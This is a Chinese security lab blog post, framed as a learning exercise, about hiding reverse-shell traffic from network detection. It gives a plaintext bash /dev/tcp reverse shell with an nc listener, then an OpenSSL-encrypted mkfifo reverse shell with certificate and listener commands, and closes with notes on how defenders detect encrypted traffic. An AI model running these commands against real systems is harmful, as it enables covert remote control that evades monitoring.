close

網安引領時代,彌天點亮未來



0x00寫在前面

本次測試僅供學習使用,如若非法他用,與平台和本文作者無關,需自行負責!



0x01背景描述

在攻防對抗過程中的橫行滲透,經常需要反彈反向shell操作,如果反彈 shell過程中流量是明文傳輸,那麼內網環境中已有的安全檢測產品(WAF/IPS/IDS/NDR/HIDS)等防護軟件會進行流量檢測,明文傳輸帶有明顯的攻擊特徵。很快會被檢測發現,防守方對攻擊流量回溯分析,就會阻斷攻擊行為。


0x02明文流量

反彈shell命令

bash -i>& /dev/tcp/10.211.55.7/12388 0>&1

nc監聽命令

nc.exe -l -p 12388

通信過程由受害主機發起

通過Wireshark抓包分析流量,整個通信過程全部為明文傳輸。

過濾tcp端口

tcp.port == 12388

追蹤tcp數據流

可以明顯看到操作行為。


0x03加密流量

通過使用OpenSSL流量加密。

1.生成OpenSSL證書,這裡使用默認參數

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2.設置監聽端口(使用生成的證書)

openssl s_server -quiet -key key.pem -cert cert.pem -port 12388

3.反彈shell命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.211.55.7:12388 > /tmp/s; rm /tmp/s

4.通過Wireshark抓包分析流量,整個通信過程全部為加密傳輸。

過濾端口,發現使用tls加密



0x04思考

安全的本質就是對抗!針對加密流量的檢測,傳統的基於特徵的檢測已經無法滿足攻擊發展的趨勢,只有通過不斷引入新的檢測思考才能解決。

加密流量的檢測,業界主流有2種方法:

第一種是將加密流量進行解密並進行檢測,這需要安全檢測設備充當通信雙方的代理或者由客戶提供單獨的解密證書(只能針對該證書對應的加密流量進行解碼)

第二種是在不解密的情況下進行安全檢測,這通常會採用(AI)機器學習的方法。

當然對攻擊行為的感知,也可以通過威脅狩獵發現。

知識分享完了

喜歡別忘了關注我們哦~

學海浩茫,
予以風動,
必降彌天之潤!

彌 天

安全實驗室

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()